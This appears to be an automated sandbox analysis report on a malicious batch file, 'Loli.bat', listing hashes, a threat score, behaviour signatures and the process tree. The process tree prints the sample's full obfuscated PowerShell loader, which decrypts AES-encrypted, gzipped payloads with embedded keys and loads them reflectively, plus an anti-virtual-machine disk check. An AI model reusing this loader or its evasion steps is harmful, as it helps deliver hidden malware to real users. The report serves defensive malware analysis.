Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    18-12-2024 01:57

General

  • Target

    Loli.bat

  • Size

    7.3MB

  • MD5

    8a7f2cf2f4a59fc4220c677d3b8df79e

  • SHA1

    6bb7854dc78dcb7a5e419e5eec371f4a776bb6a7

  • SHA256

    37f8cdab00b96fa1d7f5edd1c0d7ed1c048b7cf0a94b30e4b2fe507dbd69ebff

  • SHA512

    15acdd90a51634c1dbfcbee7dd2822742e42c4618e6590e238ac08abbb26c53e3c3e64e98ddb5439c7499af90eca66bb49c7dfeb5b6e01693e4e521fa5edbfc4

  • SSDEEP

    49152:ATU9DCJDJw+wDkT1uYtsfLfYJZpXAQfiWBpvuLpCKUYCPFJJ+weKaTYHlFYdWKhL:n

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with its display window hidden.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2304
    • C:\Windows\system32\fsutil.exe
      fsutil fsinfo drives
      2⤵
        PID:2392
      • C:\Windows\system32\findstr.exe
        findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
        2⤵
          PID:2536
        • C:\Windows\system32\cmd.exe
          cmd.exe /c echo function mlBf($ELFV){ Invoke-Expression -Verbose -WarningAction Inquire '$cUKE=[JZSyJZsJZteJZm.JZSJZeJZcuJZrJZiJZtJZyJZ.CJZrJZypJZtJZoJZgrJZaJZpJZhJZy.JZAeJZsJZ]:JZ:CJZrJZeJZaJZtJZe(JZ)JZ;'.Replace('JZ', ''); Invoke-Expression -WarningAction Inquire -Verbose '$cUKE.MUcodUceUc=[UcSyUcsUctUcemUc.UcSUceUccUcurUciUctyUc.UcCUcryUcpUctUcoUcgrUcapUchUcy.UcCiUcpUchUceUcrUcMoUcdUce]Uc:Uc:UcCBUcCUc;'.Replace('Uc', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$cUKE.PGxadGxdGxinGxg=Gx[GxSGxysGxtGxeGxmGx.GxSeGxcGxurGxiGxtGxy.GxCGxrGxyGxptGxogGxrGxapGxhyGx.GxPGxaGxdGxdiGxnGxgMGxoGxdGxe]Gx:Gx:GxPGxKCGxSGx7;'.Replace('Gx', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$cUKE.KmNeymN=mN[SmNysmNtmNemNm.mNCmNomNnmNvmNermNtmN]:mN:mNFmNromNmmNBmNamNsemN64mNSmNtrmNinmNgmN("7mNxhmNEmNmFmNkymNdmNQmNABmNgmNJmNjmNxmN5SmN2mNzXmN4mNgmNyrmNZmN5mNbmNevmNGYmNPmN6NmN3FmNBmNEmNDmNEmNAsmN=mN");'.Replace('mN', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$cUKE.IqHV=qH[qHSyqHstqHeqHmqH.CqHoqHnqHvqHeqHrtqH]qH::qHFqHrqHomqHBqHaqHsqHe6qH4SqHtqHriqHngqH("7qHkeqHvqHCJqHfOqH5qHxqHcGqHIqHhqHeqH7qHI+qH/qHv7qHAqH=qH=");'.Replace('qH', ''); $Llou=$cUKE.CreateDecryptor(); $jyzK=$Llou.TransformFinalBlock($ELFV, 0, $ELFV.Length); $Llou.Dispose(); $cUKE.Dispose(); $jyzK;}function OVPC($ELFV){ Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$AFBf=Nlrewlr-lrOblrjelrclrtlr Slrylrslrtlrelrm.lrIlrO.lrMlrelrmolrrlrylrSlrtrlrealrmlr(,$ELFV);'.Replace('lr', ''); Invoke-Expression -Debug -InformationAction Ignore -Verbose -WarningAction Inquire '$gddj=Nlrewlr-lrOblrjelrclrtlr Slrylrslrtlrelrm.lrIlrO.lrMlrelrmolrrlrylrSlrtrlrealrmlr;'.Replace('lr', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$tBrH=NPFewPF-PFObPFjePFcPFtPF SPFyPFsPFtPFePFm.PFIPFO.PFCPFoPFmpPFrPFePFsPFsiPFonPF.PFGZPFipPFSPFtPFrPFePFamPF($AFBf, 
[PFIOPF.PFCoPFmpPFrPFePFssPFiPFoPFnPF.PFCoPFmPFprPFePFsPFsiPFoPFnPFMPFodPFe]PF:PF:DPFecPFoPFmPFpPFrPFesPFsPF);'.Replace('PF', ''); $tBrH.CopyTo($gddj); $tBrH.Dispose(); $AFBf.Dispose(); $gddj.Dispose(); $gddj.ToArray();}function rFaI($ELFV,$XuUO){ Invoke-Expression -Verbose '$cPFF=[PJSyPJsPJtePJm.PJRPJePJflPJePJcPJtPJiPJonPJ.PJAsPJsPJePJmbPJlPJyPJ]PJ::PJLoPJaPJd([byte[]]$ELFV);'.Replace('PJ', ''); Invoke-Expression -InformationAction Ignore '$GtPT=$cPFF.EjyntjyrjyyPjyoijynjyt;'.Replace('jy', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$GtPT.WqInWqvWqokWqe(Wq$WqnWqulWqlWq, $XuUO);'.Replace('Wq', '');}$TzAi = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $TzAi;$drwF=[System.IO.File]::ReadAllText($TzAi).Split([Environment]::NewLine);foreach ($EhXl in $drwF) { if ($EhXl.StartsWith('bhKKm')) { $cwwY=$EhXl.Substring(5); break; }}$tyyO=[string[]]$cwwY.Split('\');Invoke-Expression -InformationAction Ignore -Debug '$jQc = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[0].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$oYu = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[1].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$bao = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[2].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');rFaI $jQc $null;rFaI $oYu $null;rFaI $bao (,[string[]] (''));
          2⤵
            PID:2988
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2056

        Network

        MITRE ATT&CK Enterprise v15


        Downloads

        • memory/2056-4-0x000007FEF60AE000-0x000007FEF60AF000-memory.dmp

          Filesize

          4KB

        • memory/2056-6-0x0000000002070000-0x0000000002078000-memory.dmp

          Filesize

          32KB

        • memory/2056-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

          Filesize

          2.9MB

        • memory/2056-7-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

          Filesize

          9.6MB

        • memory/2056-8-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

          Filesize

          9.6MB

        • memory/2056-9-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

          Filesize

          9.6MB

        • memory/2056-10-0x000007FEF60AE000-0x000007FEF60AF000-memory.dmp

          Filesize

          4KB